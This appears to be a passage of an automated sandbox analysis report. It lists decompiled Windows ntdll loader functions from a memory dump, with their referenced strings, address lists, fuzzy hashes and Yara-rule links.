                                                                                                                    0x00af8238
                                                                                                                    0x00af8238
                                                                                                                    0x00af823d
                                                                                                                    0x00af823d
                                                                                                                    0x00aa3da0
                                                                                                                    0x00aa3daf
                                                                                                                    0x00aa3db5
                                                                                                                    0x00aa3dba
                                                                                                                    0x00aa3dba
                                                                                                                    0x00aa3dd4
                                                                                                                    0x00aa3e94
                                                                                                                    0x00aa3eab
                                                                                                                    0x00aa3f6d
                                                                                                                    0x00aa3f84
                                                                                                                    0x00aa406b
                                                                                                                    0x00aa406b
                                                                                                                    0x00aa406e
                                                                                                                    0x00aa406e
                                                                                                                    0x00aa4070
                                                                                                                    0x00aa4074
                                                                                                                    0x00af8351
                                                                                                                    0x00af8351
                                                                                                                    0x00aa407a
                                                                                                                    0x00aa407f
                                                                                                                    0x00af835d
                                                                                                                    0x00af8370
                                                                                                                    0x00af8377
                                                                                                                    0x00af8379
                                                                                                                    0x00af837c
                                                                                                                    0x00af837c
                                                                                                                    0x00af835d
                                                                                                                    0x00000000
                                                                                                                    0x00aa407f
                                                                                                                    0x00aa3f8a
                                                                                                                    0x00aa3f8d
                                                                                                                    0x00aa3f90
                                                                                                                    0x00aa3f95
                                                                                                                    0x00af830d
                                                                                                                    0x00af830f
                                                                                                                    0x00aa3f9b
                                                                                                                    0x00aa3fac
                                                                                                                    0x00aa3fae
                                                                                                                    0x00aa3fb1
                                                                                                                    0x00aa3fb1
                                                                                                                    0x00aa3fb6
                                                                                                                    0x00af8317
                                                                                                                    0x00af831a
                                                                                                                    0x00000000
                                                                                                                    0x00aa3fbc
                                                                                                                    0x00aa3fc1
                                                                                                                    0x00aa3fc9
                                                                                                                    0x00aa3fd7
                                                                                                                    0x00aa3fda
                                                                                                                    0x00aa3fdd
                                                                                                                    0x00aa4021
                                                                                                                    0x00aa4021
                                                                                                                    0x00aa4029
                                                                                                                    0x00aa4030
                                                                                                                    0x00aa4044
                                                                                                                    0x00aa4046
                                                                                                                    0x00aa4046
                                                                                                                    0x00aa4044
                                                                                                                    0x00aa4049
                                                                                                                    0x00af8327
                                                                                                                    0x00af8334
                                                                                                                    0x00af8339
                                                                                                                    0x00af833c
                                                                                                                    0x00aa404f
                                                                                                                    0x00aa404f
                                                                                                                    0x00aa404f
                                                                                                                    0x00aa4051
                                                                                                                    0x00aa4056
                                                                                                                    0x00aa4063
                                                                                                                    0x00aa4063
                                                                                                                    0x00aa4068
                                                                                                                    0x00000000
                                                                                                                    0x00aa4068
                                                                                                                    0x00aa3fdf
                                                                                                                    0x00aa3fe2
                                                                                                                    0x00aa3fe4
                                                                                                                    0x00aa3fe7
                                                                                                                    0x00aa3fef
                                                                                                                    0x00aa4003
                                                                                                                    0x00aa4005
                                                                                                                    0x00aa4005
                                                                                                                    0x00aa400c
                                                                                                                    0x00aa4013
                                                                                                                    0x00aa4016
                                                                                                                    0x00aa4017
                                                                                                                    0x00aa401b
                                                                                                                    0x00aa401e
                                                                                                                    0x00000000
                                                                                                                    0x00aa401e
                                                                                                                    0x00aa3fb6
                                                                                                                    0x00aa3eb1
                                                                                                                    0x00aa3eb4
                                                                                                                    0x00aa3eb7
                                                                                                                    0x00aa3ebc
                                                                                                                    0x00af82a9
                                                                                                                    0x00af82ab
                                                                                                                    0x00aa3ec2
                                                                                                                    0x00aa3ed3
                                                                                                                    0x00aa3ed5
                                                                                                                    0x00aa3ed8
                                                                                                                    0x00aa3ed8
                                                                                                                    0x00aa3edd
                                                                                                                    0x00af82b3
                                                                                                                    0x00af82b6
                                                                                                                    0x00000000
                                                                                                                    0x00aa3ee3
                                                                                                                    0x00aa3ee8
                                                                                                                    0x00aa3eed
                                                                                                                    0x00aa3ef0
                                                                                                                    0x00aa3ef3
                                                                                                                    0x00aa3f02
                                                                                                                    0x00aa3f05
                                                                                                                    0x00aa3f08
                                                                                                                    0x00af82c0
                                                                                                                    0x00af82c3
                                                                                                                    0x00af82c5
                                                                                                                    0x00af82c8
                                                                                                                    0x00af82d0
                                                                                                                    0x00af82e4
                                                                                                                    0x00af82e6
                                                                                                                    0x00af82e6
                                                                                                                    0x00af82ed
                                                                                                                    0x00af82f4
                                                                                                                    0x00af82f7
                                                                                                                    0x00af82f8
                                                                                                                    0x00af82fc
                                                                                                                    0x00af82ff
                                                                                                                    0x00af82ff
                                                                                                                    0x00aa3f0e
                                                                                                                    0x00aa3f11
                                                                                                                    0x00aa3f16
                                                                                                                    0x00aa3f1d
                                                                                                                    0x00aa3f31
                                                                                                                    0x00af8307
                                                                                                                    0x00af8307
                                                                                                                    0x00aa3f31
                                                                                                                    0x00aa3f39
                                                                                                                    0x00aa3f48
                                                                                                                    0x00aa3f4d
                                                                                                                    0x00aa3f50
                                                                                                                    0x00aa3f50
                                                                                                                    0x00aa3f53
                                                                                                                    0x00aa3f58
                                                                                                                    0x00aa3f65
                                                                                                                    0x00aa3f65
                                                                                                                    0x00aa3f6a
                                                                                                                    0x00000000
                                                                                                                    0x00aa3f6a
                                                                                                                    0x00aa3edd
                                                                                                                    0x00aa3dda
                                                                                                                    0x00aa3ddd
                                                                                                                    0x00aa3de0
                                                                                                                    0x00aa3de5
                                                                                                                    0x00af8245
                                                                                                                    0x00aa3deb
                                                                                                                    0x00aa3df7
                                                                                                                    0x00aa3dfc
                                                                                                                    0x00aa3dfe
                                                                                                                    0x00aa3e01
                                                                                                                    0x00aa3e01
                                                                                                                    0x00aa3e06
                                                                                                                    0x00af824d
                                                                                                                    0x00af824f
                                                                                                                    0x00af8254
                                                                                                                    0x00000000
                                                                                                                    0x00aa3e0c
                                                                                                                    0x00aa3e11
                                                                                                                    0x00aa3e16
                                                                                                                    0x00aa3e19
                                                                                                                    0x00aa3e29
                                                                                                                    0x00aa3e2c
                                                                                                                    0x00aa3e2f
                                                                                                                    0x00af825c
                                                                                                                    0x00af825f
                                                                                                                    0x00af8261
                                                                                                                    0x00af8264
                                                                                                                    0x00af826c
                                                                                                                    0x00af8280
                                                                                                                    0x00af8282
                                                                                                                    0x00af8282
                                                                                                                    0x00af8289
                                                                                                                    0x00af8290
                                                                                                                    0x00af8293
                                                                                                                    0x00af8294
                                                                                                                    0x00af8298
                                                                                                                    0x00af829b
                                                                                                                    0x00af829b
                                                                                                                    0x00aa3e35
                                                                                                                    0x00aa3e38
                                                                                                                    0x00aa3e3d
                                                                                                                    0x00aa3e44
                                                                                                                    0x00aa3e58
                                                                                                                    0x00af82a3
                                                                                                                    0x00af82a3
                                                                                                                    0x00aa3e58
                                                                                                                    0x00aa3e60
                                                                                                                    0x00aa3e6f
                                                                                                                    0x00aa3e74
                                                                                                                    0x00aa3e77
                                                                                                                    0x00aa3e77
                                                                                                                    0x00aa3e7a
                                                                                                                    0x00aa3e7f
                                                                                                                    0x00aa3e8c
                                                                                                                    0x00aa3e8c
                                                                                                                    0x00aa3e91
                                                                                                                    0x00000000
                                                                                                                    0x00aa3e91

                                                                                                                    Strings
                                                                                                                    • Kernel-MUI-Language-Allowed, xrefs: 00AA3DC0
                                                                                                                    • Kernel-MUI-Language-SKU, xrefs: 00AA3F70
                                                                                                                    • Kernel-MUI-Number-Allowed, xrefs: 00AA3D8C
                                                                                                                    • WindowsExcludedProcs, xrefs: 00AA3D6F
                                                                                                                    • Kernel-MUI-Language-Disallowed, xrefs: 00AA3E97
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                    • API String ID: 0-258546922
                                                                                                                    • Opcode ID: 5cde25176d377eddbc106b68304dcf73c0a946b2d48343880dcecd185e059794
                                                                                                                    • Instruction ID: 714a27e0609bf7936e90b48214f9a180650c734fb1ecceb6c33c0e6a04d8b7b1
                                                                                                                    • Opcode Fuzzy Hash: 5cde25176d377eddbc106b68304dcf73c0a946b2d48343880dcecd185e059794
                                                                                                                    • Instruction Fuzzy Hash: AEF14A72D00618EFCB11DF98CA80AEEBBB9FF49750F15406AF505AB251DB749E00DBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AC8E00, Relevance: 6.4, Strings: 5, Instructions: 126COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 44%
                                                                                                                    			E00AC8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0xb8d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0xb88464; // 0x75150110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0xb85780 & 0x00000003) != 0) {
							E00B15510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0xb85780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E00ADB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0xb87984; // 0x632b48
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0xb88464; // 0x75150110
					 *0xb8b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E00AC9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0xb85780 & 0x00000005) != 0) {
						_push(_t49);
						E00B15510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                                                                                    0x00ac8e0f
                                                                                                                    0x00ac8e16
                                                                                                                    0x00ac8e19
                                                                                                                    0x00ac8e1b
                                                                                                                    0x00ac8e21
                                                                                                                    0x00ac8e7f
                                                                                                                    0x00ac8e85
                                                                                                                    0x00b09354
                                                                                                                    0x00b0936c
                                                                                                                    0x00b09371
                                                                                                                    0x00b0937b
                                                                                                                    0x00b09381
                                                                                                                    0x00b09381
                                                                                                                    0x00b0937b
                                                                                                                    0x00ac8e9d
                                                                                                                    0x00ac8e9d
                                                                                                                    0x00ac8e29
                                                                                                                    0x00ac8e2c
                                                                                                                    0x00ac8e38
                                                                                                                    0x00ac8e3e
                                                                                                                    0x00ac8e43
                                                                                                                    0x00ac8eb5
                                                                                                                    0x00ac8eb9
                                                                                                                    0x00b092aa
                                                                                                                    0x00b092af
                                                                                                                    0x00b092e8
                                                                                                                    0x00b092e8
                                                                                                                    0x00b092af
                                                                                                                    0x00ac8eb9
                                                                                                                    0x00ac8e45
                                                                                                                    0x00ac8e53
                                                                                                                    0x00ac8e5b
                                                                                                                    0x00ac8e5f
                                                                                                                    0x00ac8e78
                                                                                                                    0x00ac8e78
                                                                                                                    0x00ac8e7d
                                                                                                                    0x00ac8ec3
                                                                                                                    0x00ac8ecd
                                                                                                                    0x00ac8ed2
                                                                                                                    0x00ac8ed2
                                                                                                                    0x00ac8ec5
                                                                                                                    0x00ac8ec5
                                                                                                                    0x00000000
                                                                                                                    0x00ac8e7d
                                                                                                                    0x00ac8e67
                                                                                                                    0x00ac8ea4
                                                                                                                    0x00b0931a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b09320
                                                                                                                    0x00ac8ea4
                                                                                                                    0x00ac8e70
                                                                                                                    0x00b09325
                                                                                                                    0x00b09340
                                                                                                                    0x00b09345
                                                                                                                    0x00b09345
                                                                                                                    0x00ac8e76
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 00B0932A
                                                                                                                    • H+c, xrefs: 00AC8E2C
                                                                                                                    • LdrpFindDllActivationContext, xrefs: 00B09331, 00B0935D
                                                                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 00B0933B, 00B09367
                                                                                                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 00B09357
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: H+c$LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                    • API String ID: 0-181498674
                                                                                                                    • Opcode ID: 7f2df8b06f142cffbdce757f36a376a59e5da82c0e766c4fda413744d6bb9087
                                                                                                                    • Instruction ID: 77f43fb81abb2b24ba5e3db3e1d0a660e1b82ba3f5c7725e64e11d96e4e538f6
                                                                                                                    • Opcode Fuzzy Hash: 7f2df8b06f142cffbdce757f36a376a59e5da82c0e766c4fda413744d6bb9087
                                                                                                                    • Instruction Fuzzy Hash: 2A41D332A00315EEDB35AB588C89F76B6B5BB54744F0B85ADE808571A1EF68EC80C781
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AA8794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • LdrpDoPostSnapWork, xrefs: 00AF9C1E
                                                                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 00AF9C28
                                                                                                                    • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 00AF9C18
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                                                                    • API String ID: 2994545307-1948996284
                                                                                                                    • Opcode ID: 3a2f5b5a98c539221b66b62bd6e3d4688aa4b5cab745084d129a6c5ccf4396c0
                                                                                                                    • Instruction ID: 5d1ae37e8eae45a6ad5cb92efff5f2137bd0fef1a1572fb16c2cd2a6e181acd0
                                                                                                                    • Opcode Fuzzy Hash: 3a2f5b5a98c539221b66b62bd6e3d4688aa4b5cab745084d129a6c5ccf4396c0
                                                                                                                    • Instruction Fuzzy Hash: 25912771A00219DFDF28DF59C881ABEB7B5FF4A350B554069E905AB291EF38ED01CB90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AA7E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • minkernel\ntdll\ldrmap.c, xrefs: 00AF98A2
                                                                                                                    • Could not validate the crypto signature for DLL %wZ, xrefs: 00AF9891
                                                                                                                    • LdrpCompleteMapModule, xrefs: 00AF9898
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                    • API String ID: 0-1676968949
                                                                                                                    • Opcode ID: e608e4a7d79668b34362c1cc1b5f48f7a04b606c942ab45b51550cc3d1bc04b4
                                                                                                                    • Instruction ID: c76095caa9908f2946b2e9873bd8a247563139800d879428c202649f9dda8982
                                                                                                                    • Opcode Fuzzy Hash: e608e4a7d79668b34362c1cc1b5f48f7a04b606c942ab45b51550cc3d1bc04b4
                                                                                                                    • Instruction Fuzzy Hash: 1651DE316087849BDB32CBA8CD84B6B7BE4AF46354F144699F9519B2E2D770ED00CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00A9E620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00A9E68C
                                                                                                                    • @, xrefs: 00A9E6C0
                                                                                                                    • InstallLanguageFallback, xrefs: 00A9E6DB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                                    • API String ID: 0-1757540487
                                                                                                                    • Opcode ID: 8545d5e231a7c0ad192d1c4a945a6bac74275ea7345f9c3a5b62456f3720204c
                                                                                                                    • Instruction ID: 25d8684655ea1d60bea892ef2532131a417e43411bad4607a595ba88aae30bfc
                                                                                                                    • Opcode Fuzzy Hash: 8545d5e231a7c0ad192d1c4a945a6bac74275ea7345f9c3a5b62456f3720204c
                                                                                                                    • Instruction Fuzzy Hash: E25180769087459BCB14DFA4C480ABBB3E9BF88715F05092EFA85D7241F734DD4487A2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AAD5E0, Relevance: 2.9, Strings: 2, Instructions: 353COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: P/c$`*c
                                                                                                                    • API String ID: 0-1250329396
                                                                                                                    • Opcode ID: 653e74a5533eddaf27fb17c2e450af8721cd4592c1c179db7982725ebd40dafd
                                                                                                                    • Instruction ID: ef51db63da0d37be4952d2fe29f7177d477fa1c7f31300883faf62e5be791cba
                                                                                                                    • Opcode Fuzzy Hash: 653e74a5533eddaf27fb17c2e450af8721cd4592c1c179db7982725ebd40dafd
                                                                                                                    • Instruction Fuzzy Hash: E9E1C230A00359CFDB34DF68C944BB9B7B2BF46304F144199E98A9BAE1DB349D81CB51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B151BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID: Legacy$UEFI
                                                                                                                    • API String ID: 2994545307-634100481
                                                                                                                    • Opcode ID: ab34b8881481cdc59fb161304b616e144e16a8032808e5cfd40ef360672f9252
                                                                                                                    • Instruction ID: 46b478e4f7f74edddaa6157f2f7423518f9f7b719f94574b3fc2fa95b8a09bc0
                                                                                                                    • Opcode Fuzzy Hash: ab34b8881481cdc59fb161304b616e144e16a8032808e5cfd40ef360672f9252
                                                                                                                    • Instruction Fuzzy Hash: 3D518E71E00A18DFDB24DFA8D980AAEB7F8FF88740F54806DE51AEB251D6709980CB54
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00A9B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: _vswprintf_s
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 677850445-0
                                                                                                                    • Opcode ID: e3e7a1362bcc9e10633d212e73af2abba5d99fd9bb8c8948b1cc6222728acff7
                                                                                                                    • Instruction ID: cd523e642eec2f7e471a1e4c3cb6f987b25509f98af985f2b8e0c738cc3c99fa
                                                                                                                    • Opcode Fuzzy Hash: e3e7a1362bcc9e10633d212e73af2abba5d99fd9bb8c8948b1cc6222728acff7
                                                                                                                    • Instruction Fuzzy Hash: AF51C275E102598ADF31CFA8C985BBFBBF0AF08710F2042ADE959AB281D7744D419B90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00ABB944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00ABB9A5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 885266447-0
                                                                                                                    • Opcode ID: 66aefe4631f0887f8cbf9373d7bd1e3d4a02c6dfcb91d6f3a197b85d699655d0
                                                                                                                    • Instruction ID: 3a64c53f6b461df63e75d6b39453a805e26cf100320b29b17b3b42591713d3b9
                                                                                                                    • Opcode Fuzzy Hash: 66aefe4631f0887f8cbf9373d7bd1e3d4a02c6dfcb91d6f3a197b85d699655d0
                                                                                                                    • Instruction Fuzzy Hash: 66514771A18301CFC720CF28C58096ABBE9FB88740F64496EF59587356DBB1EC44CBA2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AC2581, Relevance: 1.6, Strings: 1, Instructions: 329COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: PATH
                                                                                                                    • API String ID: 0-1036084923
                                                                                                                    • Opcode ID: 04ae43cdf65031d7d8f9b03bd8cfa2524b9e2b0c5dd29fc07f245b428b23a713
                                                                                                                    • Instruction ID: add9ca35174c218638f13cddbcd4c5660c27eba157dc0ae186ecb37a6538ffe7
                                                                                                                    • Opcode Fuzzy Hash: 04ae43cdf65031d7d8f9b03bd8cfa2524b9e2b0c5dd29fc07f245b428b23a713
                                                                                                                    • Instruction Fuzzy Hash: F2C15D75E00219DFCB25DF98D981FAEB7B5FF48700F5A4069E401BB2A1DB74A941CB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00ACFAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 00B0BE0F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                                                                    • API String ID: 0-865735534
                                                                                                                    • Opcode ID: d71662fd511cf66d984c5b56226a724a79daf20c00e38c270ed751767e16c15a
                                                                                                                    • Instruction ID: c201d45a8d17fd6b1754d15508b65afa2fae937fbd5bbd1b12c9b054854aa2b6
                                                                                                                    • Opcode Fuzzy Hash: d71662fd511cf66d984c5b56226a724a79daf20c00e38c270ed751767e16c15a
                                                                                                                    • Instruction Fuzzy Hash: 5DA1DF71B0460A8FDB25DB68C850FAAB7F6EB49714F1546BEE806DB691DB30DC01CB90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00A92D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: RTL: Re-Waiting
                                                                                                                    • API String ID: 0-316354757
                                                                                                                    • Opcode ID: ed7faba22a293953e9bb2e2290b08fc29467aaa1711f1e9fcb3926223bde5466
                                                                                                                    • Instruction ID: 54cdc8d8e9fd9dd6cce02004ca7849d584ddc0904b12814d699ebba287364096
                                                                                                                    • Opcode Fuzzy Hash: ed7faba22a293953e9bb2e2290b08fc29467aaa1711f1e9fcb3926223bde5466
                                                                                                                    • Instruction Fuzzy Hash: F561FD31B00684AFDF21DB69C884B7EBBF5EB44354F2406BAE8159B2D2CB349D00C781
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00A952A5, Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 0,c
                                                                                                                    • API String ID: 0-916481998
                                                                                                                    • Opcode ID: 69904f8abdfb1b1894cf5fab8d199d39f5d91ec06394b5503fb5aab2c872b154
                                                                                                                    • Instruction ID: 9cb5bcc91fc8114c3fc63f1bf1d9b2e4846dcb78a77e95e9d07f47fef992410f
                                                                                                                    • Opcode Fuzzy Hash: 69904f8abdfb1b1894cf5fab8d199d39f5d91ec06394b5503fb5aab2c872b154
                                                                                                                    • Instruction Fuzzy Hash: F051DF31209741AFC722EF68C942B6BBBE8FF50710F10091EF495876A2EB70E844C792
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B60EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: `
                                                                                                                    • API String ID: 0-2679148245
                                                                                                                    • Opcode ID: 41b81ba028ef315fddcd3f452a8c2acac664f6d0802e1786bd100b65f15b7296
                                                                                                                    • Instruction ID: fd82ba6938445cecafc558bd23b4e46a92f80be7380f446ebcedef9d004ee019
                                                                                                                    • Opcode Fuzzy Hash: 41b81ba028ef315fddcd3f452a8c2acac664f6d0802e1786bd100b65f15b7296
                                                                                                                    • Instruction Fuzzy Hash: 2951DF712043429FD725DF29D981B2BB7E9EBC4304F0849ACF98697291D774EC45CB62
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00ACF0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 0-2766056989
                                                                                                                    • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                                    • Instruction ID: d088eb3795562120c3d54dae9e4beaf090d35be107e2f3002b2ff38905216862
                                                                                                                    • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                                    • Instruction Fuzzy Hash: 4E515871604710AFC321DF19C841E6BBBF9BF88710F108A2EF99687691E7B4E944CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

